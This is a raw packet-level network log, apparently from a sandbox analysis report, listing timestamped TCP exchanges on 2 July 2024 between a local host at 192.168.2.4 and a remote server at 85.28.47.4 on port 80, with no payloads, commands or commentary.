                                            Jul 2, 2024 08:26:22.017704964 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.017765045 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.017776012 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.017786026 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.017802954 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.017818928 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.017819881 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.017832041 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.017836094 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.017844915 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.017848969 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.017857075 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.017868996 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.017868996 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.017887115 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.017908096 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.018290997 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.018301010 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.018311977 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.018322945 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.018332005 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.018362999 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.018387079 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.018533945 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.018546104 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.018556118 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.018567085 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.018568993 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.018578053 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.018594027 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.018624067 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.018840075 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.018855095 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.018866062 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.018877029 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.018882036 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.018894911 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.018903017 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.018906116 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.018918037 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.018925905 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.018929005 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.018940926 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.018951893 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.018951893 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.018969059 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.018978119 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.018980026 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.018985033 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.018990993 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.018997908 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.019025087 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.019876003 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.019887924 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.019896984 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.019908905 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.019918919 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.019929886 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.019931078 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.019942045 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.019948959 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.019952059 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.019963026 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.019973040 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.019974947 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.019985914 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.019995928 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.019998074 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.020009041 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.020013094 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.020020008 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.020030975 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.020032883 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.020067930 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.020451069 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.020462990 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.020473957 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.020503998 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.020513058 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.092602968 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.092634916 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.092644930 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.092663050 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.092689991 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.092726946 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.092740059 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.092750072 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.092761993 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.092771053 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.092796087 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.092824936 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.092981100 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.093030930 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.099050045 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.099093914 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.099098921 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.099106073 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.099128962 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.099164963 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.099247932 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.099261999 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.099272966 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.099292040 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.099324942 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.099456072 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.099468946 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.099479914 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.099493027 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.099513054 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.099524021 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.099554062 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.099746943 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.099759102 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.099771023 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.099783897 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.099796057 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.099797010 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.099807024 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.099807978 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.099819899 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.099832058 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.099836111 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.099855900 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.099926949 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.100194931 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.100207090 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.100215912 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.100244045 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.100254059 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.100347042 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.100358963 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.100368977 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.100380898 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.100392103 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.100393057 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.100425959 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.100436926 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.100747108 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.100758076 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.100769043 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.100780964 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.100790024 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.100792885 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.100805044 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.100815058 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.100817919 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.100828886 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.100840092 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.100841045 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.100861073 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.100881100 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.105475903 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.105530977 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.105564117 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.105581999 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.105604887 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.105626106 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.105680943 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.105694056 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.105705023 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.105715990 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.105726957 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.105732918 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.105762959 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.105775118 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.105874062 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.105886936 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.105921984 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.105956078 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.105998039 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.106009007 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.106048107 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.106076002 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.106087923 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.106123924 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.106163979 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.106177092 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.106208086 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.106230974 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.106251001 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.106261015 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.106306076 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.106370926 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.106381893 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.106394053 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.106405020 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.106416941 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.106443882 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.106591940 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.106602907 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.106614113 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.106626034 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.106637955 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.106641054 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.106654882 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.106661081 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.106668949 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.106678009 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.106702089 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.106899023 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.106910944 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.106921911 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.106934071 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.106945992 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.106950998 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.106969118 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.106985092 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.107146978 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.107158899 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.107168913 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.107181072 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.107192993 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.107196093 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.107219934 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.107234955 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.107414961 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.107426882 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.107436895 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.107448101 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.107466936 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.107466936 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.107479095 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.107487917 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.107491016 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.107501984 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.107501984 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.107513905 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.107523918 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.107531071 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.107536077 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.107558012 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.107575893 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.107953072 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.107965946 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.107978106 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.108000994 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.108023882 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.108136892 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.108150005 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.108160019 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.108171940 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.108182907 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.108184099 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.108195066 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.108210087 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.108222008 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.108247042 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.108422041 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.108433008 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.108443022 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.108462095 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.108470917 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.108474016 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.108491898 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.108494043 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.108508110 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.108515024 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.108520985 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.108531952 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.108537912 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.108549118 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.108561993 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.108587027 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.108866930 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.108876944 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.108916044 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.181615114 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.181641102 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.181649923 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.181730032 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.181787014 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.181799889 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.181824923 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.181871891 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.181915045 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.181926966 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.181955099 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.181982040 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.187931061 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.187994003 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.188004017 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.188014030 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.188035011 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.188043118 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.188080072 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.188169956 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.188180923 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.188190937 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.188200951 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.188213110 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.188239098 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.188368082 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.188407898 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.188431978 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.188471079 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.188543081 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.188553095 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.188561916 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.188571930 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.188582897 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.188591957 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.188618898 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.188824892 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.188834906 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.188844919 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.188853979 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.188863993 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.188872099 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.188874960 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.188884974 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.188894033 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.188895941 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.188915014 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.188931942 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.189301014 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.189311981 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.189316988 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.189321995 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.189331055 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.189342022 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.189352989 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.189378977 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.189392090 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.189754963 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.189764977 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.189774990 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.189785004 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.189795971 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.189800978 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.189804077 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.189815044 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.189821959 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.189851046 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.189876080 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.194369078 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.194386005 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.194423914 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.194444895 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.194485903 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.194516897 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.194528103 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.194561958 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.194571972 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.194631100 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.194641113 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.194672108 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.194685936 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.194705009 CEST806388085.28.47.4192.168.2.4
